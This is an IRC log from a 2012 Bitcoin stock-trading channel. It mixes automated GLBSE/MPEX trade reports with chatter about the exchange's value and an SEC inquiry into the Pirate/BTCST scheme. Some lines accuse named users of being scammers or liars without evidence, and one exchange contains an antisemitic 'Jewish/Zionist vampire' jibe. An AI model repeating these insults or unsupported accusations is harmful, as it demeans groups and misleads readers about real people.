17:21:17 jobs coming to you is the new hotness. Sep 24 17:25:53 jobs come to the 1% Sep 24 17:26:00 the rest can either starve, camwhore or apply for jobs Sep 24 17:26:13 the distinction between the three being largely an academic point. Sep 24 17:26:45 the difference between camwhore and others is that others don't do it on the internet .......... :-D Sep 24 17:26:47 (kidding) Sep 24 17:28:08 :D Sep 24 17:29:37 [GLBSE] [ASICMINER] 119 @ 0.115 = 13.685 BTC [+] Sep 24 17:31:33 usagi: I need your attention for a while... please! :-) Sep 24 17:32:17 [GLBSE] [ASICMINER] 1 @ 0.115 BTC [+] Sep 24 17:32:45 [GLBSE] [NYAN.C] 1 @ 0.2852 BTC [-] Sep 24 17:32:46 [GLBSE] [NYAN.C] 3 @ 0.285 = 0.855 BTC [-] Sep 24 17:32:47 [GLBSE] [NYAN.C] 7 @ 0.2602 = 1.8214 BTC [-] Sep 24 17:32:48 [GLBSE] [NYAN.C] 26 @ 0.26 = 6.76 BTC [-] Sep 24 17:34:54 [GLBSE] [NYAN.C] 11 @ 0.26 = 2.86 BTC [-] Sep 24 17:35:03 [MPEX] [F.GIGA.ETF] 2900 @ 0.00029208 = 0.847 BTC [-] Sep 24 17:35:05 [MPEX] [S.MPOE] 9800 @ 0.00041702 = 4.0868 BTC [-] Sep 24 17:36:34 [GLBSE] [NYAN.C] 6 @ 0.2512 = 1.5072 BTC [-] Sep 24 17:37:23 [GLBSE] [NYAN.C] 30 @ 0.251 = 7.53 BTC [-] Sep 24 17:37:55 [GLBSE] [NYAN.C] 1 @ 0.24105 BTC [-] Sep 24 17:40:14 so it looks like S.DICE will go over 10k this month. Sep 24 17:47:54 [GLBSE] [KRAKEN] 3 @ 0.009 = 0.027 BTC [-] Sep 24 17:54:37 usagi: dont you know nefario's phone number or something? Sep 24 17:56:27 [GLBSE] [PIMP] 5 @ 0.09 = 0.45 BTC [+] Sep 24 17:57:25 [GLBSE] [RSM] 2 @ 0.275 = 0.55 BTC [-] Sep 24 17:59:44 [GLBSE] [RSM] 4 @ 0.25 = 1 BTC [-] Sep 24 18:01:03 [MPEX] [F.GIGA.ETF] 3700 @ 0.00029208 = 1.0807 BTC [-] Sep 24 18:01:05 [MPEX] [S.MPOE] 7700 @ 0.0004182 = 3.2201 BTC [+] Sep 24 18:01:06 [MPEX] [S.MPOE] 15206 @ 0.0004169 = 6.3394 BTC [-] Sep 24 18:01:09 [MPEX] [S.MPOE] 9500 @ 0.00041644 = 3.9562 BTC [-] Sep 24 18:08:50 [GLBSE] [OBSI.HRPT] 1 @ 0.07697999 BTC [+] Sep 24 18:09:46 http://www.sec.gov/litigation/complaints/2012/comp-pr2012-112.pdf << i wonder if this makes the pirate passthrough people a little worried. Sep 24 18:10:27 [GLBSE] [GIGAMINING] 1 @ 0.6435 BTC [-] Sep 24 18:10:29 [GLBSE] [GIGAMINING] 5 @ 0.64330001 = 3.2165 BTC [-] Sep 24 18:10:29 [GLBSE] [GIGAMINING] 4 @ 0.6433 = 2.5732 BTC [-] Sep 24 18:18:29 [GLBSE] [YABMC] 1 @ 0.08177 BTC [-] Sep 24 18:18:30 [GLBSE] [YABMC] 31 @ 0.08175689 = 2.5345 BTC [-] Sep 24 18:18:32 [GLBSE] [YABMC] 4 @ 0.08175688 = 0.327 BTC [-] Sep 24 18:18:58 [GLBSE] [YABMC] 2 @ 0.08175543 = 0.1635 BTC [-] Sep 24 18:20:07 usagi: did you vote or not on the motion? Sep 24 18:20:31 [GLBSE] [ASICMINER] 25 @ 0.115 = 2.875 BTC [+] Sep 24 18:24:22 [GLBSE] [ASICMINER] 2 @ 0.115 = 0.23 BTC [+] Sep 24 18:27:28 [GLBSE] [YABMC] 1 @ 0.08187 BTC [+] Sep 24 18:27:35 [GLBSE] [YABMC] 4 @ 0.08185 = 0.3274 BTC [-] Sep 24 18:28:04 [MPEX] [S.MPOE] 44900 @ 0.00041579 = 18.669 BTC [-] Sep 24 18:28:21 [GLBSE] [YABMC] 4 @ 0.08175 = 0.327 BTC [-] Sep 24 18:29:02 [GLBSE] [YABMC] 13 @ 0.08185 = 1.0641 BTC [+] Sep 24 18:29:40 [GLBSE] [ASICMINER] 6 @ 0.115 = 0.69 BTC [+] Sep 24 18:32:37 [GLBSE] [ASICMINER] 10 @ 0.115 = 1.15 BTC [+] Sep 24 18:39:44 [GLBSE] [BMMO] 2 @ 0.07686399 = 0.1537 BTC [+] Sep 24 18:39:45 [GLBSE] [BMMO] 6 @ 0.076864 = 0.4612 BTC [+] Sep 24 18:40:04 [GLBSE] [BMMO] 6 @ 0.06515 = 0.3909 BTC [-] Sep 24 18:41:10 [GLBSE] [BMMO] 7 @ 0.076864 = 0.538 BTC [+] Sep 24 18:41:39 !pl OBSI.HRPT Sep 24 18:41:40 !pl [@] [] Sep 24 18:41:58 !pl OBSI.HRPT 1@.1 Sep 24 18:41:59 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 24 18:42:07 OBSI.HRPT [1@0.1BTC] paid: 0.068245 BTC. Last price: 0.07697999 BTC. Capital gain: -0.02302001 BTC. Total: 0.04522499 BTC. (45.2%) Sep 24 18:44:02 [GLBSE] [BMMO] 9 @ 0.0620001 = 0.558 BTC [-] Sep 24 18:44:34 [GLBSE] [BMMO] 2 @ 0.076864 = 0.1537 BTC [+] Sep 24 18:45:06 [11:38:29] I should run a motion "Is EB an asshole" Sep 24 18:45:10 [GLBSE] [BMMO] 1 @ 0.076864 BTC [+] Sep 24 18:45:49 [GLBSE] [BMMO] 1 @ 0.0620001 BTC [-] Sep 24 18:45:51 [GLBSE] [BMMO] 1 @ 0.062 BTC [-] Sep 24 18:46:17 [GLBSE] [BMMO] 1 @ 0.0200001 BTC [-] Sep 24 18:48:07 [GLBSE] [ASICMINER] 2 @ 0.115 = 0.23 BTC [+] Sep 24 18:49:15 [GLBSE] [OBSI.HRPT] 1 @ 0.0769 BTC [-] Sep 24 18:49:22 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 24 18:49:34 OBSI.HRPT [1@0.11BTC] (since: 2012-09-15) paid: 0.0075 BTC. Last price: 0.0769 BTC. Capital gain: -0.0331 BTC. Total: -0.0256 BTC. (-23.3%) Sep 24 18:50:23 http://imgur.com/gallery/GG4ne Sep 24 18:50:25 holy fuck Sep 24 18:50:37 hollywood didnt fuck something up for once Sep 24 18:50:59 UNLIKE THE COMPLETE BOX SET OF LAW AND ORDER WHICH IS LIKE $500 AND _DOESNT INCLUDE THE FINAL SEASON_ Sep 24 18:52:56 and it gets even worse, its a mix of dvds and blurays Sep 24 18:53:06 you can put 480p content on a bluray ffs Sep 24 18:53:27 half a season of l&o would fit on one disc Sep 24 18:53:43 and hell, why even continue with the 480p content Sep 24 18:53:50 rip it from the original film again Sep 24 18:54:03 there are 4:3 blurays, they are still sharper than fuck Sep 24 18:54:04 [MPEX] [S.MPOE] 1900 @ 0.00041579 = 0.79 BTC [-] Sep 24 18:54:04 [MPEX] [S.MPOE] 1962 @ 0.00041521 = 0.8146 BTC [-] Sep 24 18:56:18 [GLBSE] [BFLS.RIG] 1 @ 0.79 BTC [+] Sep 24 18:58:07 they prolly filmed on video Sep 24 19:00:21 [GLBSE] [BFLS] 3 @ 0.63 = 1.89 BTC [+] Sep 24 19:01:02 mircea_popescu: dunno Sep 24 19:01:09 early seasons looked pretty good if it was just video Sep 24 19:01:36 plus, video back then was often 4:2:2 Sep 24 19:01:50 480p would lose half the chroma resolution if you did that Sep 24 19:02:44 [GLBSE] [BFLS] 1 @ 0.63 BTC [+] Sep 24 19:03:49 i recently graduated to a dvr at my home Sep 24 19:04:04 why buy any digital medai anymore? Sep 24 19:04:22 everything except for bitcoin is easily copied Sep 24 19:04:46 jcpham: oh fuck dvrs Sep 24 19:04:54 I just use netflix on a roku Sep 24 19:04:56 Flash drives have killed disk media, people just haven't realized it yet. Sep 24 19:05:07 i realised it Sep 24 19:05:14 haven't bought round stuff for years Sep 24 19:05:20 [GLBSE] [YABMC] 1 @ 0.08199998 BTC [+] Sep 24 19:06:49 netflix killed hollywood Sep 24 19:07:05 and by killed, I meant injected cash into it because its the only profitable thing they have left Sep 24 19:11:50 [GLBSE] [DMC] 1 @ 0.04999998 BTC [+] Sep 24 19:12:12 [GLBSE] [DMC] 1 @ 0.004001 BTC [-] Sep 24 19:12:46 ahahah Sep 24 19:20:03 [MPEX] [S.MPOE] 27866 @ 0.00041475 = 11.5574 BTC [-] Sep 24 19:20:05 [MPEX] [S.MPOE] 4634 @ 0.00041474 = 1.9219 BTC [-] Sep 24 19:27:18 [GLBSE] [YABMC] 1 @ 0.08175 BTC [-] Sep 24 19:27:22 a quarter of glbse is up for grabs Sep 24 19:27:26 apparently Sep 24 19:28:28 jcpham even the owners of glbse making a run for it ? Sep 24 19:28:48 https://bitcointalk.org/index.php?topic=112402.0 Sep 24 19:28:55 jump in that conversation Sep 24 19:31:18 .py 17500 * .3 Sep 24 19:31:21 5250.0 Sep 24 19:31:28 i am curious if he gets 2k Sep 24 19:31:54 it would be strategic for you mircea_popescu Sep 24 19:32:06 i don't see you doing it, but highly strategic Sep 24 19:32:07 no it would not. Sep 24 19:32:15 i made them an offer in may. they didn't sell then Sep 24 19:32:22 the 1 year value of glbse is now 0. Sep 24 19:32:42 oh Sep 24 19:33:33 "I can't publicly release any info about revenue, profit, or dividend payments." Sep 24 19:33:34 lmao Sep 24 19:33:41 yeah i noticed that to Sep 24 19:33:45 i can release the info, but it doesn't look good anyway. Sep 24 19:33:53 they're making enough money to buy a tin of soup. Sep 24 19:34:02 yum Sep 24 19:34:06 chicken noodle Sep 24 19:34:21 ramen powered software shall take over the world! Sep 24 19:34:39 https://bitcointalk.org/index.php?topic=112269.0 Sep 24 19:35:47 yeah Sep 24 19:36:29 https://bitcointalk.org/index.php?topic=53329.0 Sep 24 19:36:35 OT is still chugging along Sep 24 19:36:53 yeah, it is. Sep 24 19:36:59 OT may be bitcoin's saviour or totally destroiy it Sep 24 19:37:30 curious to see what effect it has Sep 24 19:37:35 eh i don;t see either Sep 24 19:37:46 it's just a tool. maybe it makes it. eventuyally something like that will exist. Sep 24 19:39:15 [GLBSE] [OBSI.HRPT] 22 @ 0.06500003 = 1.43 BTC [-] Sep 24 19:43:32 [GLBSE] [BIF.BTCST.PPT] 10 @ 0.010001 = 0.1 BTC [+] Sep 24 19:43:34 [GLBSE] [BIF.BTCST.PPT] 27 @ 0.0100001 = 0.27 BTC [-] Sep 24 19:50:03 [MPEX] [S.MPOE] 25900 @ 0.00041474 = 10.7418 BTC [-] Sep 24 19:59:37 [GLBSE] [FPGAMINING] 3 @ 0.48 = 1.44 BTC [-] Sep 24 20:17:06 [GLBSE] [PUREMINING] 2 @ 0.1087 = 0.2174 BTC [+] Sep 24 20:18:03 [MPEX] [S.MPOE] 11339 @ 0.00041506 = 4.7064 BTC [+] Sep 24 20:18:05 [MPEX] [S.MPOE] 10394 @ 0.00041581 = 4.3219 BTC [+] Sep 24 20:18:06 [MPEX] [S.MPOE] 10943 @ 0.00041985 = 4.5944 BTC [+] Sep 24 20:20:29 so anyone has an estimate as to when usagi gets bored of trying to prop his bs "companies" with donations of his own money to show profit and just goes awol ? before/after end of next month ? Sep 24 20:25:29 [GLBSE] [SILVER] 50 @ 0.009935 = 0.4968 BTC [-] Sep 24 20:35:47 [GLBSE] [GIGAMINING] 1 @ 0.6668 BTC [+] Sep 24 20:42:42 EskimoBob, mircea_popescu: so what happens when usagi and I end up both winning in our respective ventures? Sep 24 20:42:58 define winning Sep 24 20:43:01 wont that make both of you look like scammers and trolls? Sep 24 20:43:19 nothing anyone else can make me look like a scammer. Sep 24 20:43:28 +does Sep 24 20:43:44 this is generally true, a scammer is a scammer for what he does, not for what others do. Sep 24 20:44:46 [GLBSE] [GIGAMINING] 5 @ 0.6668 = 3.334 BTC [+] Sep 24 20:44:48 [MPEX] [F.GIGA.ETF] 5289 @ 0.00029208 = 1.5448 BTC [-] Sep 24 20:44:49 [MPEX] [F.GIGA.ETF] 5261 @ 0.00029109 = 1.5314 BTC [-] Sep 24 20:44:50 [MPEX] [F.GIGA.ETF] 707 @ 0.00029 = 0.205 BTC [-] Sep 24 20:46:30 Diablo-D3 i thought you were going to define "winning" for you and usagi both. cat ate your tongue ? Sep 24 20:47:07 I was? Sep 24 20:47:15 yes. Sep 24 20:47:21 [GLBSE] [GIGAMINING] 1 @ 0.6668 BTC [+] Sep 24 20:47:27 I dont remember saying I was going to define it Sep 24 20:47:43 o. i see. well... good luck ? Sep 24 20:48:09 though, I see your point, Im not sure how to define usagi's winning condition Sep 24 20:48:17 it could be as simple as "hasnt folded" Sep 24 20:48:28 A NEVER ENDING WAR Sep 24 20:48:34 wait, I think I have music for this Sep 24 20:48:42 hence the question. does he make it till the end of october or not. Sep 24 20:49:25 mircea_popescu: october? jesus Sep 24 20:49:48 at least try, man Sep 24 20:49:54 maybe october of 2013 Sep 24 20:50:08 if you're going to troll, you gotta go big Sep 24 20:50:51 i'm not trolling. Sep 24 20:51:00 yessssss you are. Sep 24 20:56:02 [MPEX] [O.BTCUSD.C080T] 3 @ 0.34955291 = 1.0487 BTC [+] Sep 24 20:56:04 [MPEX] [O.BTCUSD.C080T] 1 @ 0.34471521 BTC [-] Sep 24 20:56:05 [MPEX] [O.BTCUSD.C080T] 996 @ 0.33821127 = 336.8584 BTC [-] Sep 24 20:57:02 [MPEX] [O.BTCUSD.C090T] 2 @ 0.26785161 = 0.5357 BTC [+] Sep 24 20:57:04 [MPEX] [O.BTCUSD.C090T] 998 @ 0.25511268 = 254.6025 BTC [-] Sep 24 20:57:40 hrm, not quite Sep 24 20:58:03 [MPEX] [O.BTCUSD.C100T] 1000 @ 0.17201409 = 172.0141 BTC [+] Sep 24 20:58:29 cool :) Sep 24 20:58:33 thanks :P Sep 24 20:58:36 [MPEX] [B.MPCD.A] 30000 @ 0.00101748 = 30.5244 BTC [+] Sep 24 20:58:49 [GLBSE] [FPGAMINING] 2 @ 0.48 = 0.96 BTC [-] Sep 24 20:58:50 [GLBSE] [FPGAMINING] 43 @ 0.4829 = 20.7647 BTC [+] Sep 24 20:58:51 [GLBSE] [FPGAMINING] 44 @ 0.483 = 21.252 BTC [+] Sep 24 20:58:52 [GLBSE] [FPGAMINING] 5 @ 0.486 = 2.43 BTC [+] Sep 24 20:58:54 [GLBSE] [FPGAMINING] 4 @ 0.489 = 1.956 BTC [+] Sep 24 20:58:55 [GLBSE] [FPGAMINING] 22 @ 0.499 = 10.978 BTC [+] Sep 24 20:58:56 [GLBSE] [FUTUREFUND] 2 @ 0.00012 = 0.0002 BTC [-] Sep 24 20:59:02 [MPEX] [B.MPCD.B] 25000 @ 0.00102622 = 25.6555 BTC [+] Sep 24 20:59:17 usagi: hrm Sep 24 20:59:25 you do know I never refused to buy hardware, right? Sep 24 20:59:51 [MPEX] [O.BTCUSD.C110T] 8 @ 0.10766051 = 0.8613 BTC [+] Sep 24 21:00:14 Hmm, I just got an email from the United States Securities and Exchange Commission... and it seems like it's legit. Sep 24 21:00:23 Very interesting. Sep 24 21:00:25 everyone got it BTC-Mining Sep 24 21:00:36 I didnt get one :< Sep 24 21:00:40 and yes, the general opinion is that it's legit. Sep 24 21:00:48 See, some people didn't Sep 24 21:00:55 attorney named confirmed it when contacted Sep 24 21:01:03 [MPEX] [O.BTCUSD.C110T] 1000 @ 0.0889155 = 88.9155 BTC [-] Sep 24 21:01:07 whats the letter say? Sep 24 21:01:08 BTC-Mining i meant people who are someone :D Sep 24 21:02:21 umm Sep 24 21:02:26 usagi: he'd basically have to destroy GLBSE to do it. Sep 24 21:02:27 i got no email from uss Sep 24 21:02:29 :( Sep 24 21:02:32 the forgot about me. Sep 24 21:02:40 usagi: if he wants to do that, thats his own choice, but he needs to leave DMC out of it Sep 24 21:02:51 BTC-Mining, can you share? Sep 24 21:03:00 i got a pastie somewhere Sep 24 21:03:05 ok Sep 24 21:03:08 urlpls then Sep 24 21:03:17 http://pastebin.com/3ZXYMmwr there Sep 24 21:03:27 fenks. Sep 24 21:04:08 LOL Sep 24 21:04:13 they are writing becaseu of btcst Sep 24 21:04:14 rofl Sep 24 21:04:33 btcst? Sep 24 21:04:36 oh Sep 24 21:04:37 pirate Sep 24 21:04:58 I'd write back to them and tell them pirate doesnt exist and it was a scam that didnt make any money Sep 24 21:05:10 no one could possibly be stupid enough to "invest" in pirate Sep 24 21:05:27 except for the whole community Sep 24 21:05:48 Diablo-D3 except they didn't ask you now did they. Sep 24 21:06:12 kakobrekla: apparently Im the smartest person in the community Sep 24 21:06:18 I didnt give that idiot one dime Sep 24 21:06:28 actually, Im sorry, he isnt an idiot Sep 24 21:06:32 hes a genius Sep 24 21:06:43 he just walked out the front door of fort knox with all the gold in tow. Sep 24 21:07:33 and you people did nothing to stop him Sep 24 21:07:51 hell, you held the door open for him because he had his arms full of gold bars. Sep 24 21:10:11 Eheh Sep 24 21:10:12 [GLBSE] [PUREMINING] 4 @ 0.1087 = 0.4348 BTC [+] Sep 24 21:10:26 Nice way to picture it. Sep 24 21:10:37 im smarter Diablo-D3 Sep 24 21:11:02 [GLBSE] [YABMC] 6 @ 0.08189999 = 0.4914 BTC [+] Sep 24 21:11:03 i was in and had it insured. Sep 24 21:11:03 [GLBSE] [YABMC] 4 @ 0.08199999 = 0.328 BTC [+] Sep 24 21:11:05 ;> Sep 24 21:11:27 thats just dishonest, really Sep 24 21:11:39 [GLBSE] [GIGAMINING] 1 @ 0.667 BTC [+] Sep 24 21:11:39 right. Sep 24 21:14:21 [GLBSE] [BTC-BOND] 1 @ 0.0099995 BTC [+] Sep 24 21:17:27 [GLBSE] [OBSI.HRPT] 39 @ 0.06502001 = 2.5358 BTC [+] Sep 24 21:17:29 [GLBSE] [OBSI.HRPT] 7 @ 0.06502 = 0.4551 BTC [-] Sep 24 21:17:30 [GLBSE] [OBSI.HRPT] 54 @ 0.06500002 = 3.51 BTC [-] Sep 24 21:17:31 [GLBSE] [OBSI.HRPT] 250 @ 0.065 = 16.25 BTC [-] Sep 24 21:18:10 !ticker obsi.hrpt Sep 24 21:18:20 [GLBSE:OBSI.HRPT] [Bid: 0.064] [Ask: 0.07672999] [Spread: 0.01272999] [Last: 0.065] [24hVol: 228.72232967] [7dAvg: 0.09165309] Sep 24 21:18:28 !pl obsi.hrpt .1 Sep 24 21:18:29 Requesting data from GLBSE (might take a while, also might return fishy results as it does not account for splits etc). Sep 24 21:18:54 OBSI.HRPT [1@0.1BTC] paid: 0.068245 BTC. Last price: 0.065 BTC. Capital gain: -0.035 BTC. Total: 0.033245 BTC. (33.2%) Sep 24 21:20:13 sgornick should get a trophy or something. Sep 24 21:20:21 he's always in there, answering noob questions etc. Sep 24 21:23:08 > everyone got it BTC-Mining Sep 24 21:23:10 What's this? Sep 24 21:23:56 Ah, I see now http://pastebin.com/3ZXYMmwr Sep 24 21:25:00 the sec btcst investigation Sep 24 21:26:09 [MPEX] [S.MPOE] 5057 @ 0.00041985 = 2.1232 BTC [+] Sep 24 21:26:10 [MPEX] [S.MPOE] 35843 @ 0.00042 = 15.0541 BTC [+] Sep 24 21:26:58 So we will find out what happen 10 years from now. Sep 24 21:27:01 Sweet. Sep 24 21:27:54 maybe 5. Sep 24 21:28:25 their latest prosecution is on stuff happening in 2008/2009 so Sep 24 21:30:32 [GLBSE] [FPGAMINING] 1 @ 0.499 BTC [+] Sep 24 21:32:22 send them moar porn! that should keep them busy for awhile! Sep 24 21:35:17 "After we finish one more Star Trek porn parody, we'll get to investigating this." Sep 24 21:35:29 "We promise." Sep 24 21:37:22 actually they strike me as remarkably on the ball Sep 24 21:37:39 it's been what, a month ? they already have emails to get in touch with etc. Sep 24 21:37:54 seems a cut above the rest. Sep 24 21:39:03 http://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=1&cad=rja&ved=0CCIQFjAA&url=http%3A%2F%2Fabcnews.go.com%2FGMA%2Fsec-pornography-employees-spent-hours-surfing-porn-sites%2Fstory%3Fid%3D10452544&ei=wKhgUKLVG8e62gWd8oDICg&usg=AFQjCNF2GLXroKv-GkU59lR4YZJqBnuEaw&sig2=NICAe6w0l9Ylwp5PyWqxeA Sep 24 21:39:51 [GLBSE] [TYGRR.BOND-B] 55 @ 0.1 = 5.5 BTC [-] Sep 24 21:40:32 "Porn Problem Began as Economy Collapsed" Sep 24 21:40:54 "SEC porn scandal results in zero firings, agency says" Sep 24 21:41:06 Welcome to the public sector. Sep 24 21:42:42 Well, they probably know how to archive irc chats. Which of the nick's here also lurks in #btcst? i.e., which one is logging for posterity? Sep 24 21:42:58 I used to Sep 24 21:45:22 I was there when Pirate said fuck it I quit Sep 24 21:45:37 got that on a log somewhere on one of my machines Sep 24 21:47:16 http://www.youtube.com/watch?v=l4zAUGoTW_E kinda funny Sep 24 21:47:25 .title Sep 24 21:47:27 mircea_popescu: Max Keiser: recommends BITCOIN - Global Collapse by April (18 Sept 2012) - YouTube Sep 24 21:49:44 [GLBSE] [NASTY] 1 @ 0.49979999 BTC [+] Sep 24 21:49:46 [GLBSE] [NASTY] 1 @ 0.4998 BTC [+] Sep 24 21:56:38 I'm confused how would EskimoBob be a scammer did I miss a post? Sep 24 21:56:39 [MPEX] [F.GIGA.ETF] 7376 @ 0.00029 = 2.139 BTC [-] Sep 24 21:56:40 dammit I miss one episode of Th Days of our Bitcoin lives and im completely lost. Sep 24 21:56:41 Goddamn bitcoin is the most interesting soap opear I've ever watched... not that I've ever watched one. Sep 24 21:56:43 the young and the restless was good about 15 years ago Sep 24 21:56:43 Looks like usagi bought shares off of EB at a profit for EB in exchange for EB shutting up, but he never did. Sep 24 21:56:44 I had a babysitter that watched them when I was around 8 years old, I pretty much wanted to kill her. Sep 24 21:56:45 Ahh I see Obsi Sep 24 21:56:52 [GLBSE] [GIGAMINING] 4 @ 0.6668 = 2.6672 BTC [-] Sep 24 21:56:53 [GLBSE] [GIGAMINING] 1 @ 0.6502 BTC [-] Sep 24 21:56:53 [GLBSE] [GIGAMINING] 3 @ 0.65000001 = 1.95 BTC [-] Sep 24 21:56:53 [GLBSE] [GIGAMINING] 105 @ 0.65 = 68.25 BTC [-] Sep 24 21:57:08 [GLBSE] [PAJKA.BOND] 3 @ 0.08235 = 0.2471 BTC [+] Sep 24 21:58:08 Whoever called the FTC on BFL Sep 24 21:58:10 fuck you Sep 24 21:58:18 wat Sep 24 21:58:26 o.O Sep 24 21:58:26 link? Sep 24 21:58:51 https://bitcointalk.org/index.php?topic=112438.0 Sep 24 21:59:10 Bane_Capital their bank did. Sep 24 21:59:22 Ugh Sep 24 21:59:25 [GLBSE] [GIGAMINING] 1 @ 0.64350001 BTC [-] Sep 24 21:59:26 [GLBSE] [GIGAMINING] 2 @ 0.6435 = 1.287 BTC [-] Sep 24 21:59:27 [GLBSE] [GIGAMINING] 3 @ 0.64330001 = 1.9299 BTC [-] Sep 24 21:59:28 [GLBSE] [GIGAMINING] 12 @ 0.6433 = 7.7196 BTC [-] Sep 24 21:59:30 [GLBSE] [GIGAMINING] 5 @ 0.6402 = 3.201 BTC [-] Sep 24 21:59:31 [GLBSE] [GIGAMINING] 1 @ 0.6401 BTC [-] Sep 24 21:59:32 [GLBSE] [GIGAMINING] 198 @ 0.64 = 126.72 BTC [-] Sep 24 21:59:40 I enjoy their offshore libertarianism Sep 24 21:59:47 I consider them heroes Sep 24 22:00:02 but no Sep 24 22:00:05 nevertheless, when you receive tons of cash you get reported. Sep 24 22:00:23 I see now. Sep 24 22:01:49 "GLBSE he asked about" Sep 24 22:01:54 [GLBSE] [YABMC] 5 @ 0.08189999 = 0.4095 BTC [-] Sep 24 22:01:55 [GLBSE] [YABMC] 25 @ 0.08199999 = 2.05 BTC [+] Sep 24 22:01:59 i lolled at that part. how's the legitimization coming along nefario ? Sep 24 22:02:13 "Today in IRC EskimoBob was being an especially annoying jerk to me" Sep 24 22:02:20 I lol'd at that for some reason Sep 24 22:02:28 [GLBSE] [OBSI.HRPT] 2 @ 0.07536434 = 0.1507 BTC [+] Sep 24 22:02:28 Actually I have the reason Sep 24 22:02:29 odd, he never bothers me. Sep 24 22:02:33 but I am going to be quiet. Sep 24 22:03:05 The Jewish Vampire? Sep 24 22:03:07 Is that you? Sep 24 22:03:15 o looky ? a .ro domain ?! Sep 24 22:03:28 or should I say the Zionist vampire? Sep 24 22:03:28 sorry, more like slavic one Sep 24 22:03:51 Welcome to Kingbrand Valium Sep 24 22:03:55 fascinating. Sep 24 22:04:05 Oh crap why did you add me to it, I want none of this battle. Sep 24 22:04:09 [GLBSE] [OBSI.HRPT] 2 @ 0.07536435 = 0.1507 BTC [+] Sep 24 22:04:25 Doffx ? Sep 24 22:04:48 https://bitcointalk.org/index.php?topic=112443.msg1217180#new Sep 24 22:04:52 She's mad, bro. Sep 24 22:04:52 i love .ro domain, $60 for life. Sep 24 22:04:53 Oh he put my nam in the post Sep 24 22:04:54 [GLBSE] [ASICMINER] 14 @ 0.115 = 1.61 BTC [+] Sep 24 22:04:58 Name too Sep 24 22:05:28 I dont own any offerings from any party listed Sep 24 22:05:36 [GLBSE] [PPT.A] 150 @ 0.32 = 48 BTC [+] Sep 24 22:05:39 I figured you were all scammers and it would fail. Sep 24 22:05:40 :) Sep 24 22:05:52 vampireb provided they don' cvhange the rules in a few years. Sep 24 22:06:08 "you" ?! Sep 24 22:06:47 I am pretty confident usagi is a she based on the writing style. Sep 24 22:06:57 Men just don't talk like that Sep 24 22:07:06 [GLBSE] [PPT.B] 129 @ 0.32 = 41.28 BTC [+] Sep 24 22:07:13 [GLBSE] [OBSI.HRPT] 22 @ 0.07602808 = 1.6726 BTC [+] Sep 24 22:07:18 o, usagi ? yeah, he's a liar. as per https://bitcointalk.org/index.php?topic=97178.msg1217005#msg1217005 Sep 24 22:07:36 Bane_Capital i think it's an ex-he. Sep 24 22:08:01 yawns. Sep 24 22:08:25 #1 Internet rule Bane_Capital, all girls on the Internet are men. Sep 24 22:08:45 Doffx: Not the way I use it. Sep 24 22:08:56 Haha, I think Porn is the 1 exception. Sep 24 22:09:11 although that’s very suspect as well Sep 24 22:09:11 porn is not the exception Sep 24 22:09:15 porn is the rule. Sep 24 22:09:22 Haha Sep 24 22:09:39 im really impressed with nefario's quietness. Sep 24 22:09:48 He's just eating popcorn Sep 24 22:09:54 a major investor decides to run for the hills and the sec is asking questions about his thing all in the same day Sep 24 22:09:57 he has nothing to say. Sep 24 22:09:59 mircea_popescu, Doffx: porn is about the internet rule #34 Sep 24 22:10:01 are you closing up shop nef ? Sep 24 22:10:35 Why would he be closing shop? Sec coming after him too? Sep 24 22:10:47 We're based in the UK Sep 24 22:10:50 Nefario seems to have all his legal bases covered Sep 24 22:10:51 "GLBSE he asked about" Sep 24 22:10:53 we answer to the FSA Sep 24 22:10:53 are there even good assets on glbse? i would invest if I could short everything Sep 24 22:10:57 not the SEC Sep 24 22:11:03 tacobeans Sep 24 22:11:10 vampireb i am shorting not everything but pretty close Sep 24 22:11:11 Intrade is hosted in Ireland Sep 24 22:11:16 so the UK seems fitting Sep 24 22:11:35 the uk is in such close union with the us by now i wouldn't put much hope in that. Sep 24 22:11:44 you'll be extradited in about 12 hours if it comes to it. Sep 24 22:11:56 Nah, UK is where all Financial fraud is protected. Sep 24 22:12:14 Hes in the best place id say, there is more protection for him than us as the exchange owner. Sep 24 22:12:37 maybe. Sep 24 22:12:48 depends what they eventually decide to do. Sep 24 22:12:52 [GLBSE] [METAL.SILVER] 7 @ 0.098 = 0.686 BTC [+] Sep 24 22:12:54 [GLBSE] [METAL.SILVER] 5 @ 0.141 = 0.705 BTC [+] Sep 24 22:12:55 [GLBSE] [METAL.SILVER] 19 @ 0.15 = 2.85 BTC [+] Sep 24 22:13:11 [GLBSE] [ASICMINER] 68 @ 0.115 = 7.82 BTC [+] Sep 24 22:13:23 I would choose Russia for a Bitcoin Stock Exchange Sep 24 22:13:29 Pay off the mobsters to keep me secure. Sep 24 22:13:43 who are you to pay them off tho ? Sep 24 22:13:46 Take advantage of the corrupt government if you will Sep 24 22:13:50 likely they'd just take it and you can work for a salary Sep 24 22:13:54 Russia? uh Sep 24 22:13:55 I would choose mars. I'm a bit fed up with this planet... 8-) Sep 24 22:13:57 fuck no Sep 24 22:14:05 Well, it would take some capital. Sep 24 22:14:13 not capital. Sep 24 22:14:14 [GLBSE] [COGNITIVE] 6 @ 0.5751 = 3.4506 BTC [+] Sep 24 22:14:14 [GLBSE] [COGNITIVE] 10 @ 0.575 = 5.75 BTC [-] Sep 24 22:14:15 frie3nds Sep 24 22:14:15 [GLBSE] [COGNITIVE] 2 @ 0.5405 = 1.081 BTC [-] Sep 24 22:14:16 [GLBSE] [COGNITIVE] 2 @ 0.486 = 0.972 BTC [-] Sep 24 22:14:18 [GLBSE] [COGNITIVE] 2 @ 0.4857 = 0.9714 BTC [-] Sep 24 22:14:19 [GLBSE] [COGNITIVE] 2 @ 0.4856 = 0.9712 BTC [-] Sep 24 22:14:20 [GLBSE] [COGNITIVE] 10 @ 0.4854 = 4.854 BTC [-] Sep 24 22:14:43 vampireb i doubt many us citizens are capable of making friends in the russian sense of that term. Sep 24 22:14:43 [GLBSE] [ASICMINER] 34 @ 0.1151 = 3.9134 BTC [+] Sep 24 22:14:44 [GLBSE] [ASICMINER] 16 @ 0.11500001 = 1.84 BTC [-] Sep 24 22:14:46 [GLBSE] [ASICMINER] 200 @ 0.115 = 23 BTC [-] Sep 24 22:15:17 [GLBSE] [NASTY] 1 @ 0.42 BTC [-] Sep 24 22:15:19 [GLBSE] [NASTY] 1 @ 0.4152 BTC [-] Sep 24 22:15:19 [GLBSE] [NASTY] 9 @ 0.4151 = 3.7359 BTC [-] Sep 24 22:15:20 [GLBSE] 